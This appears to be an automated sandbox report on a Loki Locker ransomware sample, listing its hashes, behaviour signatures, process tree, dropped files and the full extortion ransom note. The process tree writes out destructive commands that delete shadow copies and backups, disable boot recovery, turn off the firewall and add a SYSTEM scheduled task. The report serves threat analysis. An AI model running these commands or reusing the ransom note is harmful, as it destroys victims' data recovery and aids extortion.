Overview

overview

10

Static

static

13933403b4...77.exe

windows7-x64

10

13933403b4...77.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    110s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/01/2023, 19:09

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377.exe

  • Size

    607KB

  • MD5

    9893de16867126eeb989265cd99fd201

  • SHA1

    71e0c3ee67daffada30a0bcd3abafaf59cfa8b5d

  • SHA256

    13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377

  • SHA512

    d7e175b821f3cef659c57b0f46abc35bb11f3dd47c8acdf1aa534c5faa88131e82aa2eebb0e5bfdb16a545356af975daac64a70085eee64196c5e5dfc92995ea

  • SSDEEP

    12288:o6pGFv42oseLA5Gt/arlTT6zncVUJ7vnK6U:o6pEA25WQm/cTT6DNK6U

Score
10/10
evasionpersistenceransomwaretrojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
All your files have been encrypted by Loki locker! All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email [email protected] You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay Double . In case of no answer in 24 hours (1 Day) write to this email [email protected] Your unique ID is : 12419524 You only have LIMITED time to get back your files! If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED. You will lose some of your data on day 2 in the timer. You can buy more time for pay. Just email us. THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) What is our decryption guarantee? Before paying you can send us up to for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) Attention! DO NOT pay any money before decrypting the test files. DO NOT trust any intermediary. they wont help you and you may be victim of scam. just email us , we help you in any steps. DO NOT reply to other emails. ONLY this two emails can help you. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Disables Task Manager via registry modification
    evasion
  • Modifies Windows Firewall 1 TTPs 2 IoCs
    evasion
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies Control Panel 2 IoCs
    evasion
  • Modifies registry class 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377.exe
    "C:\Users\Admin\AppData\Local\Temp\13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Modifies extensions of user files
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1948
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:5056
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3gkghddf\3gkghddf.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5028
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7081.tmp" "c:\ProgramData\CSCB2BCC30F2BF34A0DBC9133264BB9413.TMP"
        3⤵
          PID:4788
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
        2⤵
          PID:1008
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
          2⤵
            PID:3488
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3492
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic shadowcopy delete
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3892
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
            2⤵
              PID:5044
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
              2⤵
                PID:780
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                2⤵
                  PID:1244
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4644
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall set opmode mode=disable
                    3⤵
                    • Modifies Windows Firewall
                    PID:2500
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2788
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh advfirewall set currentprofile state off
                    3⤵
                    • Modifies Windows Firewall
                    PID:756
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                  2⤵
                    PID:5684
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    2⤵
                      PID:5724
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      2⤵
                        PID:5748
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        2⤵
                          PID:5772
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                          2⤵
                            PID:5800
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:820

                        Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\ProgramData\0yumhtof.exe
                                Filesize

                                28KB

                                MD5

                                17b7f783899bc27df296ad78aff09068

                                SHA1

                                a3f2c839008d5304c2d674f056560d6850500a60

                                SHA256

                                a619578c951f53f10e32037d4de60e9790cf1fdaea2d3c684721bdd5a26995cf

                                SHA512

                                62a13e7ff1e104b8e68996145a62ddb0cce381a9408d0d2d5eda47f2a37ab42b27fe63c44fd5983e9ab1ca44d866cac0e097ea7fc1f6bf9e8b800f87f8f0617e

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\RES7081.tmp
                                Filesize

                                25KB

                                MD5

                                3cf13e8ab582638570548e8592fa72ea

                                SHA1

                                b6ebdf722bbacd49781b868976d8f884fac2850f

                                SHA256

                                78271886d3605fa1ea0d6bd408f580b6f3f53881149037fabf2e0e2e673d2eea

                                SHA512

                                e903a530c8b8f26b16e142530fae82f3e800d5885e3e2b05b9965278aa46f313d63471bd9a11bc8373a8db7a2c84feed30cad6bb1f72fba418bb3d8e18d7f302

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\info.hta
                                Filesize

                                6KB

                                MD5

                                b41a7e28d9054f4bf2856ea7309cbac8

                                SHA1

                                278ba5b78aef0ab6f467cb8a9f866aa5a2d7b292

                                SHA256

                                55834885eeca57f97e1735f2ab5ef13113969c702d500dd13b58e1a6797b658d

                                SHA512

                                b33385fd17b943549da9a16a2007006278cf163de66052d8d49b1a410b0364949bbc6ead178ce70423a215af1519d2e5d257b8510d3bedf466b89dd3b8ce59cf

                                Download Submit

                              • \??\c:\ProgramData\CSCB2BCC30F2BF34A0DBC9133264BB9413.TMP
                                Filesize

                                24KB

                                MD5

                                0fbee6e443f32ddf847996f968373b9c

                                SHA1

                                a143c9c57638dc8612c32aeddb4dda9798d10f7e

                                SHA256

                                3c2f0eee5178d09a99b5104f6a61da8faae3d26352a4d91e348a8673a870a229

                                SHA512

                                ebacaa33113aca90ff826e5496bec6cc20506cfcc3e56fe536c9542a1a1e05644253ee3d46b1d090ad7980abafee5457949c9b4da2ec235b7e240753d109f560

                                Download Submit

                              • \??\c:\Users\Admin\AppData\Local\Temp\3gkghddf\3gkghddf.0.cs
                                Filesize

                                1KB

                                MD5

                                4d77ac566b029d45c02c8b718796ccc1

                                SHA1

                                0732326dcf9c36a465e46c6a3fa38c5841a14ada

                                SHA256

                                c4535df4d7124805bd5cc74de8b9f943dcc94651ed60e17fa21a273796892093

                                SHA512

                                1c300565851bc75adcd6fc43f5ac269e9d124537b25fd8130303fb7b883d2351ff92b778a7e20efffd974beef43b658d4c07002fe1a1cae00dffde7fc3f0fd8d

                                Download Submit

                              • \??\c:\Users\Admin\AppData\Local\Temp\3gkghddf\3gkghddf.cmdline
                                Filesize

                                236B

                                MD5

                                3931842991c8b9a0eb1bbb6031dbd10b

                                SHA1

                                1da8c4f89bf8db685189d6d63f26bac6ea99de6a

                                SHA256

                                d49fa0a64ca9bc01f84e22b3309b887cc1055d986c754b70c29e96ccd36fee73

                                SHA512

                                fe872de7a1e956d85ef0775a29b602fed11813ddb651cbcdd86f621e981ae971167f2917ccfd0b83adb1ad195a1c49def8450b48468a2fdced107def8b122de4

                                Download Submit

                              • \??\c:\Users\Admin\AppData\Local\Temp\w4ptlyzl.ico
                                Filesize

                                23KB

                                MD5

                                8c9a5448905c6ad6f5a15ad8f102fa56

                                SHA1

                                185575a9708fe9ff122423e459eeed7098ad11d4

                                SHA256

                                fc65491d373c30593f9ef53d83959625dc384bc42d551aa77a666d4e9b538104

                                SHA512

                                2032d1f19ac0734339626531cd77ce0509dbba93260c87505d20998ab66aa3dceee4c94e10d8620cdcc62eacf9e63bbe5357afa2a09abdaa51ca0fde8b9aed50

                                Download Submit

                              • memory/1948-134-0x00000000057B0000-0x0000000005816000-memory.dmp

                                Filesize

                                408KB

                                Download

                              • memory/1948-135-0x0000000005820000-0x0000000005896000-memory.dmp

                                Filesize

                                472KB

                                Download

                              • memory/1948-133-0x0000000005610000-0x00000000056A2000-memory.dmp

                                Filesize

                                584KB

                                Download

                              • memory/1948-136-0x0000000005570000-0x0000000005592000-memory.dmp

                                Filesize

                                136KB

                                Download

                              • memory/1948-132-0x0000000000CF0000-0x0000000000D8A000-memory.dmp

                                Filesize

                                616KB

                                Download